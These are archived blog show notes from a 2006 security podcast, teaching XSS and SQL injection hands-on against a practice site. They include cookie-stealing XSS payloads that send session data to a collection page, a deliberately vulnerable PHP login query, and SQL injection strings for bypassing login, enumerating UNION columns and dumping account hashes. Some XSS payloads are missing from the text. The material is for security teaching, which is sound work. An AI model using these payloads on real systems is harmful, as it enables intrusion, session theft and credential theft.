MightySeek » Hands On Series

Hands On Series – Cross Site Scripting (XSS) Part 1

Seek3r — Mon, 28 Aug 2006 03:57:40 +0000

The “Hands on Series” continues!

In this episode we start dealing with Cross Site Scripting (XSS) attacks.

CSS = Cascading Style Sheets
XSS = Cross Site Scripting

Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather then attacking other users.

The hackme site has been updated and improved (more about that in a moment)

and now includes a section for XSS which we will be using in this episode.

As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the hacking test site and
have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Lets start by trying to somehow add an attribute so that when someone mouses over the name, the javascript will be executed.

Attack #1 – Against Email Address

Attack 1: Original

john@somedomain.com“>John Doe

Attack 1: Desired addition
onmouseover=”alert(’Hacked’);”

Attack 1: Desired Result
onmouseover=”alert(’Hacked’);”>Bob Smith

Attack 1: Attack String
bob@bob.com” onmouseover=”alert(’Hacked’);

Attack 1: Actual Result
bob@bob.com” onmouseover=”alert(’Hacked’);”>Bob Smith

Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web browser!
This attack is only executed based on a user event (the user mousing over the link)

Lets try creating a script tag, which will get executed while the page is loaded by the browser (so basically right away).

Attack #2 – Against Email Address

Attack 2: Original
john@somedomain.com“>John Doe

Attack 2: Desired addition

Attack 2: Desired Result
<”>Bob Smith

Attack 2: Attack String
bob@bob.com”><”

Attack 2: Actual Result
bob@bob.com”><script>alert(’Hacked’);</script><”“>Bob Smith

Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.

Attack #3 – Against Title

Attack 3: Original
Works Great

Attack 3: Desired addition

Attack 3: Desired Result

Attack 3: Attack String
Works Great

Attack 3: Actual Result
Works Great

Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something that doesnt need quotes.

Attack #4 – Against Title

In the alert function lets use the global variable document.domain in the attack string.

Attack 4: Attack String
Works Great

Attack 4: Actual Result
Works Great

Success! A popup should appear that says hackme.ntobjectives.com

Maybe this isnt convincing enough… lets try cookies.

Attack #5 – Against Title

Attack 5: Attack String
Works Great

Attack 5: Actual Result

Works Great

Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.

I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure this isnt an attack point.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

Attack #6 – Against Title

Attack 6: Original
Works Great

Attack 6: Desired addition

We have already established that I cannot insert those single quotes that I need around the URL, so we need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning each decimal value into its character, and it doesnt require any quotes.

So we just convert our desired string into decimal first

This:
http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46, 99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes

Attack 6: Attack String
Works Great

Attack 6: Actual Result
Works Great

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from, and its unlikely you would have ever noticed that your session information had been stolen

Hands On Series – SQL Injection Part 1

Seek3r — Fri, 28 Apr 2006 21:56:15 +0000

The start of the “Hands on Series”, which means that there are actual
hands on excersises to go along with these shows.

I feel that its time to go beyond the concepts, the chatter about what bad guys can do,
and actually show you directly. Let you see for yourself the saying goes.

I recommend that you listen to these episodes while viewing the hacking test site and
have the show notes visible and ready to cut and paste from.

http://hackme.ntobjectives.com/ – The new site setup for you to practice web app hacking.
Includes detailed notes and samples that can be used to practice with.
Web App Hacking Toolkit – Collection of tools and links helpful for web security.
Jonathan Coulton’s Things a Week – Where the Code Monkey song came from.

Show Notes

Sample PHP code for authenticating a user during login

$sql = "SELECT * FROM accounts WHERE username='".$_GET['username']."' and password = '".md5($_GET['password'])."'";

If I enter admin for both the username and password the resulting sql statement would be as follows
SELECT * FROM accounts WHERE username='admin' and password = '21232f297a57a5a743894a0e4a801fc3'

If there is a record in accounts with both username and password as admin, then I will get logged in, otherwise the login will fail.

Thats all well and good, but there is a very critical problem.
The problem here resides in the fact that there is no validation on what the user inputs, but the input is used to create a SQL statement.

Lets take a look at the following SQL statement

SELECT * FROM accounts WHERE username='admin' /* and password = '21232f297a57a5a743894a0e4a801fc3 '

What would this statement result in?
First thing to notice is the /*

This is a comment delimiter in MySQL, which means anything following it is considered a comment and is ignored.
Another way to think about it is that the SQL Statement ends at this point.

So if there statement ends at the /* then the effective SQL statement is
SELECT * FROM accounts WHERE username='admin'

So when will this generate a valid result?

It will be valid if the username exists in the database, and if it does, then it will return that record.
This means it will log me in as the admin without need for discovering/guessing the password!!

Sounds good, how would I make the SQL statement look like that. Well try entering in this as your username
admin' /*
If you look again at the orignal SQL statement and insert this as the username you will see how it alters the SQL statement in a way that the statement is still valid in syntax but the symantic meaning has been altered to suit your needs. Here is what it will look like
SELECT * FROM accounts WHERE username='admin' /* ' and password = '21232f297a57a5a743894a0e4a801fc3'
Now isnt this cool?

Alright, now look at the source code. Theres a link to the source on the main page.

Notice that its displaying the username from the database query result.

This means we can see data from the database. So lets try using a UNION query to get arbitrary data from the database.
When using UNION queries there is a requirement that both sets of data share the exact same number of columns.
Since you dont know how many columns are being returned, we have to discover this information using this technique

How to solve over/under column problems

Start with one field using NULL as its value
admin' UNION SELECT NULL FROM accounts LIMIT 1,1 /*

This will result in an error “The used SELECT statements have a different number of columns”.
This is telling us that the two data sets do not having matching number of columns.

Add another NULL
admin' UNION SELECT NULL, NULL FROM accounts LIMIT 1,1 /*

Same error

and Add another NULL
admin' UNION SELECT NULL, NULL, NULL FROM accounts LIMIT 1,1 /*

No more error.

Now that we know how many columns we have to work with, lets concat in the data

In these we will get the account table records

admin' UNION SELECT NULL, concat(id, ' - ', username, ' - ', password) AS username, NULL FROM accounts LIMIT 1,1 /*
Notice the last field is the MD5 hash. Here is where the toolkit link to the MD5 hash database comes in handy http://www.md5decrypt.com/

Put in that md5 hash and if its a common password, you will get a result

Now lets get another user record by shifting the LIMIT to start on the next record

admin’ UNION SELECT NULL, concat(id, ‘ – ‘, username, ‘ – ‘, password) AS username, NULL FROM accounts LIMIT 2,1 /*

Now lets get data from an entirely different table

admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 1,1 /*

admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 2,1 /*

As you can see, once you have a SQL injection point you can gain access to a great deal of database information.